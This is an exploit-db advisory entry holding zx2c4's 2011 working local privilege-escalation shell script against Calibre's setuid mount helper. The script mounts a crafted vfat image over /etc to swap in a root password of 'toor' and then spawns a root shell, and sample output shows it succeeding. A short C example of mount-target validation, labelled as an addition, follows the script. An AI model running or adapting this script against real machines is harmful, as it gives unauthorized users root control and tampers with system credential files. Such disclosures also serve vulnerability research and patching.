
Calibre E-Book Reader - Local Privilege Escalation (2)

Date: 03 Nov 2011 00:00:00
Reported by: zx2c4
Type: exploitdb
Source: www.exploit-db.com

Calibre E-Book Reader local privilege escalation using mount helper to tamper with /etc/passw

Code
# Exploit Title: .60-Calibrer Assault Mount: Another Calibre E-Book Reader Local Root
# Date: Nov 2, 2011
# Author: zx2c4
# Software Link: http://calibre-ebook.com/
# Tested on: Gentoo
# Platform: Linux
# Category: Local
# CVE: pending
#!/bin/sh

                  #######################################
                  #     .60-Calibrer Assault Mount      #
                  #              by zx2c4               #
                  #######################################

################################################################################
# Yesterday we learned how Calibre's usage of execlp allowed us to override PATH
# and get root, in my ".50-Calibrer Assault Mount" exploit. Today we exploit a
# more fundamental issue with Calibre's mount helper -- namely, that it allows
# us to mount a vfat filesystem anywhere we want. By mounting a file system
# image over /etc, we are able to tinker with /etc/passwd and make the root password
# temporarily "toor".
#
# - zx2c4
# 2011-11-2
#
# Usage:
# $ ./60calibrerassaultmount.sh 
# [+] Making temporary directory: /tmp/tmp.OGgS0jaoD4
# [+] Making overlay image:
# 51200+0 records in
# 51200+0 records out
# 26214400 bytes (26 MB) copied, 0.100984 s, 260 MB/s
# mkfs.vfat 3.0.11 (24 Dec 2010)
# [+] Mounting overlay image using calibre-mount-helper.
# [+] Copying /etc into overlay.
# [+] Tampering with overlay's passwd.
# [+] Unmounting overlay image using calibre-mount-helper.
# [+] Mounting overlay to /etc using calibre-mount-helper.
# [+] Asking for root. When prompted for a password, enter 'toor'.
# Password: [typed in toor to the terminal] 
# [+] Unmounting /etc using root umount.
# [+] Cleaning up: /tmp/tmp.OGgS0jaoD4
# [+] Getting shell.
# sh-4.2# id
# uid=0(root) gid=0(root) groups=0(root)
# sh-4.2# whoami
# root
# sh-4.2# 
################################################################################


echo "#######################################"
echo "#     .60-Calibrer Assault Mount      #"
echo "#              by zx2c4               #"
echo "#######################################"
echo
echo -n "[+] Making temporary directory: "
dir="$(mktemp -d)"
echo "$dir"
cd "$dir"
echo "[+] Making overlay image:"
dd if=/dev/zero of=overlay count=51200
/usr/sbin/mkfs.vfat overlay
echo "[+] Mounting overlay image using calibre-mount-helper."
mkdir staging
calibre-mount-helper mount overlay staging
echo "[+] Copying /etc into overlay."
cd staging/
cp -a /etc/* . 2>/dev/null
echo "[+] Tampering with overlay's passwd."
cat passwd | tail -n +2 > tmp
echo "root:$(echo -n 'toor' | openssl passwd -1 -stdin):0:0:root:/root:/bin/bash" >> tmp
mv tmp passwd
echo "[+] Unmounting overlay image using calibre-mount-helper."
cd ..
calibre-mount-helper eject overlay staging >/dev/null 2>&1
echo "[+] Mounting overlay to /etc using calibre-mount-helper."
calibre-mount-helper mount overlay /etc  >/dev/null 2>&1
cd /
echo "[+] Asking for root. When prompted for a password, enter 'toor'."
su -c "echo \"[+] Unmounting /etc using root umount.\"; umount /etc; echo \"[+] Cleaning up: $dir\"; rm -rf \"$dir\"; echo \"[+] Getting shell.\"; HISTFILE=\"/dev/null\" exec /bin/sh"
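
The root cause named in the header comment is that the setuid helper accepts any mount target. The following is an added example, not code from the exploit or from Calibre, of the check a privileged mount helper can apply before mounting; the function name `mountpoint_allowed` and the idea of a single permitted base directory are assumptions made for illustration.

```c
#define _XOPEN_SOURCE 700   /* realpath(), lstat() */
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical policy check for a setuid mount helper.
 * Returns 1 only if `target`, after symlink resolution, is a directory
 * strictly below `base` and owned by `uid` (the invoking user).
 * Anything else, including /etc or a symlink pointing at it, is refused. */
int mountpoint_allowed(const char *base, const char *target, uid_t uid)
{
    char rbase[PATH_MAX], rtarget[PATH_MAX];
    struct stat st;
    size_t n;

    /* Canonicalise both paths so ".." and symlinks cannot escape base. */
    if (!realpath(base, rbase) || !realpath(target, rtarget))
        return 0;                        /* missing or unresolvable path */
    n = strlen(rbase);
    if (strncmp(rtarget, rbase, n) != 0 || rtarget[n] != '/')
        return 0;                        /* outside base, or base itself */
    if (lstat(rtarget, &st) != 0 || !S_ISDIR(st.st_mode))
        return 0;                        /* must be an existing directory */
    return st.st_uid == uid;             /* caller must own the mount point */
}

int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s BASE TARGET\n", argv[0]);
        return 2;
    }
    int ok = mountpoint_allowed(argv[1], argv[2], getuid());
    puts(ok ? "allowed" : "refused");
    return ok ? 0 : 1;
}
```

A path check followed by a separate mount call is still open to a race if the caller can swap the directory in between, so a helper should create the mount point itself inside a root-owned base or operate on an already opened directory descriptor.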

Vulners AI Score: 7.4 (High risk)